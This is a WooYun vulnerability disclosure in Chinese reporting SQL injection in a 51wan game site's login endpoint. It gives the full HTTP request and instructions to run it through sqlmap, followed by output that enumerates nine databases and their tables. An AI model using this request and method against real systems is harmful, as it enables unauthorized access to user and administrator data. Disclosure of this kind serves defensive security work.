当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0112770

漏洞标题:51wan sql注入一

相关厂商:51wan.com

漏洞作者: 天地不仁 以万物为刍狗

提交时间:2015-05-08 15:15

修复时间:2015-06-22 15:54

公开时间:2015-06-22 15:54

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-05-08: 细节已通知厂商并且等待厂商处理中
2015-05-08: 厂商已经确认,细节仅向厂商公开
2015-05-18: 细节向核心白帽子及相关领域专家公开
2015-05-28: 细节向普通白帽子公开
2015-06-07: 细节向实习白帽子公开
2015-06-22: 细节向公众公开

简要描述:

有礼物不?

详细说明:

POST /index.php?ajax=1 HTTP/1.1
Host: wkllcenter.51wan.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://wkllcenter.51wan.com/
Content-Length: 78
Cookie: PHPSESSID=alnskkf7n1vt4tog5lp21i68t4
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
ctl=Role&act=login&login_state=0&login_name=admin&passwd=admin&time=1431019419


将上面的代码保存为 2.txt 放进sqlmap里面

1.png


9个数据库 多少表我就没数了 一会儿下面贴上

2.png


既然都出数据库了 底下再跑下去也没意义了 毕竟我不脱裤

漏洞证明:

Database: admin_sister
[5 tables]
+----------------------------------------------+
| activity_list                                |
| administrator                                |
| apply_daoju_log                              |
| game_server                                  |
| log                                          |
+----------------------------------------------+
Database: new_game
[60 tables]
+----------------------------------------------+
| user                                         |
| activation_code                              |
| activity                                     |
| arena                                        |
| arena_score                                  |
| backpack                                     |
| baishen                                      |
| banghui                                      |
| banghui_member                               |
| banghui_shen                                 |
| cross_server_auction                         |
| cross_server_fight                           |
| cross_server_wenDao                          |
| data1                                        |
| data10                                       |
| data11                                       |
| data12                                       |
| data13                                       |
| data14                                       |
| data15                                       |
| data16                                       |
| data17                                       |
| data18                                       |
| data19                                       |
| data2                                        |
| data20                                       |
| data3                                        |
| data4                                        |
| data5                                        |
| data6                                        |
| data7                                        |
| data8                                        |
| data9                                        |
| dataDaoju                                    |
| dataFriend                                   |
| dataMailSys                                  |
| dataMission                                  |
| dataPkLost                                   |
| dataPkWin                                    |
| dataSys                                      |
| datagongde_shop                              |
| everyday                                     |
| game_server                                  |
| gamer                                        |
| gamer_pay                                    |
| ganqing_reward                               |
| gonggao                                      |
| hufa_pk_stand                                |
| jingshi                                      |
| mail                                         |
| online                                       |
| reg_limit                                    |
| role_level                                   |
| sale                                         |
| talent                                       |
| team                                         |
| tmp_activity                                 |
| unionFunc                                    |
| unionRole                                    |
| used_names                                   |
+----------------------------------------------+
Database: performance_schema
[17 tables]
+----------------------------------------------+
| cond_instances                               |
| events_waits_current                         |
| events_waits_history                         |
| events_waits_history_long                    |
| events_waits_summary_by_instance             |
| events_waits_summary_by_thread_by_event_name |
| events_waits_summary_global_by_event_name    |
| file_instances                               |
| file_summary_by_event_name                   |
| file_summary_by_instance                     |
| mutex_instances                              |
| performance_timers                           |
| rwlock_instances                             |
| setup_consumers                              |
| setup_instruments                            |
| setup_timers                                 |
| threads                                      |
+----------------------------------------------+
Database: sheng_tu_admin_center
[5 tables]
+----------------------------------------------+
| activity_list                                |
| administrator                                |
| apply_daoju_log                              |
| game_server                                  |
| log                                          |
+----------------------------------------------+
Database: admin_goddess
[5 tables]
+----------------------------------------------+
| activity_list                                |
| administrator                                |
| apply_daoju_log                              |
| game_server                                  |
| log                                          |
+----------------------------------------------+
Database: new_game_cehua
[36 tables]
+----------------------------------------------+
| City                                         |
| CityShop                                     |
| City_bak                                     |
| activity                                     |
| attribute_correct                            |
| city_fuben                                   |
| daoju                                        |
| equipment                                    |
| fight_jingyan                                |
| fuben                                        |
| fuben_bak                                    |
| fuben_rooms                                  |
| fuben_rooms_bak                              |
| fuben_type                                   |
| hornor                                       |
| hornor_bak                                   |
| hufa_moban                                   |
| hufa_up_level_need_points                    |
| item_skill_set                               |
| mission                                      |
| mission_bak                                  |
| mission_conditions                           |
| mission_group                                |
| mission_group_bak                            |
| mission_op                                   |
| mission_talk                                 |
| quizStore                                    |
| quizTopic                                    |
| rules_hecheng                                |
| shop                                         |
| skill                                        |
| soul                                         |
| sys                                          |
| talent                                       |
| test                                         |
| weapon                                       |
+----------------------------------------------+
Database: mysql
[24 tables]
+----------------------------------------------+
| user                                         |
| columns_priv                                 |
| db                                           |
| event                                        |
| func                                         |
| general_log                                  |
| help_category                                |
| help_keyword                                 |
| help_relation                                |
| help_topic                                   |
| host                                         |
| ndb_binlog_index                             |
| plugin                                       |
| proc                                         |
| procs_priv                                   |
| proxies_priv                                 |
| servers                                      |
| slow_log                                     |
| tables_priv                                  |
| time_zone                                    |
| time_zone_leap_second                        |
| time_zone_name                               |
| time_zone_transition                         |
| time_zone_transition_type                    |
+----------------------------------------------+
Database: new_game_admin
[6 tables]
+----------------------------------------------+
| admin_log                                    |
| every_day_total                              |
| mission                                      |
| online                                       |
| role_level                                   |
| save_lost                                    |
+----------------------------------------------+
Database: information_schema
[37 tables]
+----------------------------------------------+
| CHARACTER_SETS                               |
| COLLATIONS                                   |
| COLLATION_CHARACTER_SET_APPLICABILITY        |
| COLUMNS                                      |
| COLUMN_PRIVILEGES                            |
| ENGINES                                      |
| EVENTS                                       |
| FILES                                        |
| GLOBAL_STATUS                                |
| GLOBAL_VARIABLES                             |
| INNODB_CMP                                   |
| INNODB_CMPMEM                                |
| INNODB_CMPMEM_RESET                          |
| INNODB_CMP_RESET                             |
| INNODB_LOCKS                                 |
| INNODB_LOCK_WAITS                            |
| INNODB_TRX                                   |
| KEY_COLUMN_USAGE                             |
| PARAMETERS                                   |
| PARTITIONS                                   |
| PLUGINS                                      |
| PROCESSLIST                                  |
| PROFILING                                    |
| REFERENTIAL_CONSTRAINTS                      |
| ROUTINES                                     |
| SCHEMATA                                     |
| SCHEMA_PRIVILEGES                            |
| SESSION_STATUS                               |
| SESSION_VARIABLES                            |
| STATISTICS                                   |
| TABLES                                       |
| TABLESPACES                                  |
| TABLE_CONSTRAINTS                            |
| TABLE_PRIVILEGES                             |
| TRIGGERS                                     |
| USER_PRIVILEGES                              |
| VIEWS                                        |
+----------------------------------------------+

修复方案:

版权声明:转载请注明来源 天地不仁 以万物为刍狗@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-05-08 15:52

厂商回复:

感谢测试

最新状态:

暂无